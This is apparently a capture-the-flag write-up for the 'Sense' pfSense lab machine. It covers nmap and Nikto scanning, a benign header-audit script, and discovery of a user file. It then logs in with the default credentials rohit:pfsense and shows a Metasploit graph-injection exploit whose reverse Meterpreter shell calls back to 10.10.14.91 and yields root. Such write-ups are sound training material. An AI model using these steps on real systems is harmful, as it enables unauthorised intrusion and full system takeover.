As always, we start with discovery.

First, Sense is a firewall, so we can assume that is where the action will be.

Nmap tells us that ports 80 and 443 are open.

Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-27 11:04 CET
Stats: 0:00:25 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 15.94% done; ETC: 11:07 (0:02:17 remaining)
Stats: 0:01:30 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 68.66% done; ETC: 11:06 (0:00:41 remaining)
Nmap scan report for 10.10.10.60
Host is up (0.017s latency).
Not shown: 65533 filtered ports
PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
443/tcp open  ssl/https?
|_ssl-date: TLS randomness does not represent time

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 223.48 seconds

Sparta tells us the same, but as always it gives us more information (its Nikto run is below).

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.60
+ Target Hostname:    10.10.10.60
+ Target Port:        443
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=US/ST=Somewhere/L=Somecity/O=CompanyName/OU=Organizational Unit Name (eg, section)/CN=Common Name (eg, YOUR name)/emailAddress=Email Address
                   Ciphers:  AES256-SHA
                   Issuer:   /C=US/ST=Somewhere/L=Somecity/O=CompanyName/OU=Organizational Unit Name (eg, section)/CN=Common Name (eg, YOUR name)/emailAddress=Email Address
+ Start Time:         2019-03-27 11:06:06 (GMT1)
---------------------------------------------------------------------------
+ Server: lighttpd/1.4.35
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie cookie_test created without the secure flag
+ Cookie cookie_test created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Multiple index files found: /index.html, /index.php
+ Hostname '10.10.10.60' does not match certificate's names: Common
+ OSVDB-112004: /: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-112004: /index.php: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ OSVDB-3092: /tree/: This might be interesting...
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ /help.php: A help file was found.
+ 7500 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2019-03-27 11:14:51 (GMT1) (525 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
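The missing headers and cookie flags that Nikto reports above are cheap to re-check after remediation. The following Python script is an added example (not part of the original writeup) that runs those same four checks over constructed response headers: one set mirroring the lighttpd/1.4.35 findings above, and one hardened set.

```python
"""Re-check the header and cookie weaknesses Nikto reported (added example)."""
from typing import Dict, List

# Constructed response headers mirroring the Nikto findings for lighttpd/1.4.35.
WEAK_RESPONSE = [
    "Server: lighttpd/1.4.35",
    "Content-Type: text/html",
    "Set-Cookie: cookie_test=1; path=/",
]

# The same response after hardening (constructed).
HARDENED_RESPONSE = [
    "Server: lighttpd/1.4.35",
    "Content-Type: text/html",
    "Strict-Transport-Security: max-age=31536000; includeSubDomains",
    "X-Content-Type-Options: nosniff",
    "Set-Cookie: cookie_test=1; path=/; Secure; HttpOnly",
]


def parse_headers(lines: List[str]) -> Dict[str, List[str]]:
    """Group header values by lower-cased name; Set-Cookie may repeat."""
    parsed: Dict[str, List[str]] = {}
    for line in lines:
        name, _, value = line.partition(":")
        parsed.setdefault(name.strip().lower(), []).append(value.strip())
    return parsed


def audit_headers(lines: List[str], over_tls: bool = True) -> List[str]:
    """Return one finding per weakness, worded the way Nikto words them."""
    headers = parse_headers(lines)
    findings: List[str] = []
    if over_tls and "strict-transport-security" not in headers:
        findings.append("Strict-Transport-Security header is not defined")
    if "x-content-type-options" not in headers:
        findings.append("X-Content-Type-Options header is not set")
    for cookie in headers.get("set-cookie", []):
        parts = [p.strip() for p in cookie.split(";")]
        name = parts[0].split("=", 1)[0]
        # Cookie attributes are case-insensitive; compare them lower-cased.
        attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
        if over_tls and "secure" not in attrs:
            findings.append(f"Cookie {name} created without the secure flag")
        if "httponly" not in attrs:
            findings.append(f"Cookie {name} created without the httponly flag")
    return findings


if __name__ == "__main__":
    for label, resp in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_headers(resp) or ["no findings"])
```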

Particularly interesting are shellshock, the two index files and the other PHP locations. We will launch dirbuster with the php and txt extensions to see what else we discover. Remember to turn off recursion, otherwise it will take forever.

Dirbuster finds two files:

  1. changelog.txt
  2. system_users.txt

####Support ticket###

Please create the following user

username: Rohit
password: company defaults

Admittedly you have to guess a little, because the real username is “rohit” in lowercase and the “company defaults” password is the pfSense default, so “rohit:pfsense” gets us in.

Metasploit

From here on it is very simple.

msf5 exploit(unix/http/pfsense_graph_injection_exec) > use exploit/unix/http/pfsense_graph_injection_exec
msf5 exploit(unix/http/pfsense_graph_injection_exec) > show options

Module options (exploit/unix/http/pfsense_graph_injection_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  pfsense          yes       Password to login with
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS    10.10.10.60      yes       The target address range or CIDR identifier
   RPORT     443              yes       The target port (TCP)
   SSL       true             no        Negotiate SSL/TLS for outgoing connections
   USERNAME  rohit            yes       User to login with
   VHOST                      no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.91      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf5 exploit(unix/http/pfsense_graph_injection_exec) > exploit

[*] Started reverse TCP handler on 10.10.14.91:4444 
[*] Detected pfSense 2.1.3-RELEASE, uploading intial payload
[*] Payload uploaded successfully, executing
[*] Sending stage (38247 bytes) to 10.10.10.60
[*] Meterpreter session 3 opened (10.10.14.91:4444 -> 10.10.10.60:39599) at 2019-03-27 12:46:20 +0100
[!] Tried to delete HgyHu, unknown result

meterpreter > lpwd
/root
meterpreter > ps

Process List
============

 PID  Name  User  Path
 ---  ----  ----  ----
 0                

meterpreter > getuid
Server username: root (0)
meterpreter > 

And you are already root; with that you can cat both files.